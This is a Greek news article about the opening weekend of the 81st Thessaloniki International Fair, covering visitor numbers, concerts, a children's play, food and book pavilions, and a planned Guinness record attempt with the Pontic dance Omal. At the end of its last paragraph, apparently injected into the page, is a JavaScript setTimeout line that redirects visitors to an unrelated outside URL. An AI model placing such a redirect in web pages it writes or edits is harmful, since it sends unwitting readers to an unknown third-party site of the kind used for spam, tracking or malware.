Δυναμικό ξεκίνημα για την 81η ΔΕΘ

0
7

 

Αυξημένοι κατά 20% ήταν οι επισκέπτες της 81ης Διεθνούς Έκθεσης Θεσσαλονίκης στο πρώτο Σαββατοκύριακο λειτουργίας της, συγκριτικά με το αντίστοιχο περσινό διήμερο, όπως αναφέρεται σε σχετική ανακοίνωση της ΔΕΘ-Helexpo.

Πλήθος πολιτών έσπευσαν ήδη να περιηγηθούν στα περίπτερα και να ανακαλύψουν τις εκπλήξεις, τις οποίες ετοίμασαν φέτος οι διοργανωτές.

Κατάμεστος ήταν και ο χώρος μπροστά από τη σκηνή του Τόξου της ΧΑΝΘ, όπου η Δέσποινα Βανδή και οι Μέλισσες ενθουσίασαν το κοινό.

Χθες Δευτέρα, τη μουσική σκυτάλη πήραν ο Στέλιος Ρόκκος με τη Μαλού, που υπόσχονται νέα μελωδικά ταξίδια για τους επισκέπτες

της ΔΕΘ.

Εξάλλου, στην υπαίθρια σκηνή μπροστά από το κτήριο διοίκησης, μικροί και μεγάλοι είχαν την ευκαιρία να παρακολουθήσουν τη θεατρική παράσταση «Τα ρούχα του βασιλιά» του Χανς Κρίστιαν Άντερσεν, από την ομάδα «Ντουέντε Θέατρο & Τέχνη».

Το μεγάλο πειρατικό καράβι, μήκους 16 μέτρων, που …αγκυροβόλησε στην έκθεση προσκάλεσε τους επισκέπτες σε… ευχάριστες περιπέτειες.

Τα αφιερώματα «Η Ελλάδα στο πιάτο μας» και η «Γωνιά Γαστρονομίας» στα περίπτερα 7 και 13 αντίστοιχα άνοιξαν την όρεξη στον κόσμο, ενώ το αφιέρωμα «Bookmarket» προσέφερε μια περιήγηση στον μαγικό κόσμο του βιβλίου.

Βέβαια, και οι λάτρεις του αυτοκινήτου δεν έμειναν παραπονεμένοι, καθώς νέα μοντέλα γνωστών αυτοκινητοβιομηχανιών παρουσιάζονται στη Έκθεση.

Τέλος, αντίστροφα μετρά ο χρόνος για τον ποντιακό χορό Ομάλ, που, στο πλαίσιο της σημερινής συναυλίας των αδερφών Κωνσταντίνου και Ματθαίου Τσαχουρίδη, θα προσπαθήσει, με τη συνδρομή του κόσμου, να κατακτήσει μια θέση στο βιβλίο των ρεκόρ Γκίνες ως ο μεγαλύτερος σε μήκος και σε αριθμό συμμετεχόντων.

Ο χορός, θα «περικυκλώσει» το Διεθνές Εκθεσιακό Κέντρο Θεσσαλονίκης στις 23:00. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here